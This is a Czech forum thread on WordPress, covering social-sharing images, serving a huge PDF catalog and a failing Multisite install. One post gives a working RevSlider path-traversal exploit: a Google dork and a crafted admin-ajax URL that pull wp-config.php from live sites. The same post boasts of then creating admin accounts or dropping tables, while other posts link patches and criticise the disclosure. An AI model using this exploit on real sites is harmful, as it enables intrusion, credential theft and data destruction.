• úvod
  • témata
  • události
  • tržiště
  • diskuze
  • nástěnka
  • přihlásit
    registrace
    ztracené heslo?
    QUITEwordpress
    ZABIAS
    ZABIAS --- ---
    KEPASO: díky
    KEPASO
    KEPASO --- ---
    ZABIAS: v kazdym postu je modul pro SEO. teti polozka se tyka FB, obecne vsech socialnich siti http://i.imgur.com/FJgokTo.jpg neni potreb anahravat specialni obrazek (to je ale vhodnejsi... spravnej pomer kvuli fb atd) staci vlozit url obrazku z galerie.
    ZABIAS
    ZABIAS --- ---
    KEPASO: našel jsem pouze : Tento obrázek se používá v případě, že sdílený příspěvek/stránka neobsahuje žádné obrázky. ale potřeboval bych neco kdy to proste prehraje i obrazky co tam jsou :)
    ZABIAS
    ZABIAS --- ---
    KEPASO: můžeš mě prosím dyštak nasměrovat ? kde to nastavim yoast samo mam :)
    MICHALFRIDRICH
    MICHALFRIDRICH --- ---
    ZABIAS: není to trochu zbytečný tohle řešit pluginem, když na to stačí pár řádků kódu?
    KEPASO
    KEPASO --- ---
    ZABIAS: yoast seo ma tuhle funkci.
    ZABIAS
    ZABIAS --- ---
    ZABIAS: nějak sem to zapoměl :)
    ZABIAS
    ZABIAS --- ---
    muzete me prosim nasmerovat jakej plugin pouzit abych tam mohl natvrdo nastavit obrazek pris sdílení stranek na socialních sítí a fotka se nevybírala buh ví podle čeho ? :) díky.
    KOCMOC
    KOCMOC --- ---
    Vyplyva z toho, ze Slider Revolution (RevSlider) ani nahodou tvl, protoze kolikrat je "packaged" dodavanej s theme a neni moznost ho updatovat (pokud si nekoupis licenci), coz ani nikdo ze socek, co maj weby na WP jen tak neudela... Jisty reseni je pomoci https://wordpress.org/plugins/patch-for-revolution-slider/ a nebo http://johnbuckner.com/wordpress-slider-revolution-security-vulnerability-how-to-easily-patch-it
    KOCMOC
    KOCMOC --- ---
    MICKEY_MOUSE: A to si vem, ze revslideru se prodalo pres 50 tisic a jeste to vynasob tak 10x za warez instalace. Myslim, ze je dobry na to poukazat i s konkretnim prikladem, jinak si clovek mysli, ze se ho to netyka.
    MICKEY_MOUSE
    MICKEY_MOUSE --- ---
    KOCMOC: To možná není zas až tak úplně dobrý nápad psát na web návody, jak hackovat weby a ještě k tomu přikládat ukázky, aby to z hecu dokázal i pitomec.
    KOCMOC
    KOCMOC --- ---
    Fakt legrace, na spouste webu to jeste porad funguje :D
    1.) google dotaz inurl /wp-content/plugins/revslider/
    2.) doplnit misto casti /wp-content. . . . toto "wp-admin/admin-ajax.php?action=revslide­r_show_image&img=../wp-config.php"
    3.) stazenej wp-config.php s DB pripojenim a hura se porejpat v cizi DB, vytvorit si admin account, dropnout tables etc . . . :D

Zasranej revslider
    KEPASO
    KEPASO --- ---
    DICK85: jestli to je tiskovy pdf o nekolika stech stranach, pak by rozhodne stalo za to mit stejny pdf exportnuty pro web.
    MICKEY_MOUSE
    MICKEY_MOUSE --- ---
    HALCYON: Já jsem uživatel, vůbec tyhle techno věci nedávám. Mně web i blog jako takový jede, i teď, po převodu na multisite. Jen mi nefungují další sajty, jsou vidět pouze v menu, ale nejde vytvářet příspěvky. Čili tipuji, že v tom bude něco technického, mimo administraci.
    HALCYON
    HALCYON --- ---
    DICK85: Tak asi záleží, proč je ten katalog velký. Většina pluginů WP / pro PDF prohlížešče bude asi PDF načítat stejně jako celý soubor, to je smrt.

Pokud to PDF vzhledem k obsahu není nesmyslně velké (v tom případě by asi stálo za to ho udělat tak aby mělo pro dokument rozumnou velikost), uvažoval bych spíše o nějakém rozsekání na jednotlivé stránky / skupiny stránek do více PDF a původní gigofajl nechat pro direct download.

Jinak se asi neobejdeš bez nějaké serverové části co bude vyřezávat jednotlivé prohlížené stránky (dostatečně rychle a efektivně).
    DICK85
    DICK85 --- ---
    Ahoj, mám pdf katalog který má téměř giga. A potřeboval bych ho nějakým způsobem dostat na web tak aby se dal prohlížet a listovat v něm. Koukal jsem na nějaké pluginy, ale nenalezl jsem nic co by toto umožnovalo. děkuji
    HALCYON
    HALCYON --- ---
    MICKEY_MOUSE: Compare with backup je většinou jediný způsob jak se z těchhle situací dostávám já.
    MICKEY_MOUSE
    MICKEY_MOUSE --- ---
    Měl byste někdo chuť mi kouknout na tu Multisite, proč nejede jak má? Sám to nerozchodím, tipuju, že v tom bude nějaká blbost, kterou ale sám neobjevím.
    KOCMOC
    KOCMOC --- ---
    KOCMOC
    KOCMOC --- ---
    KOCMOC: LUIS, hezkej shell viď?
    Kliknutím sem můžete změnit nastavení reklam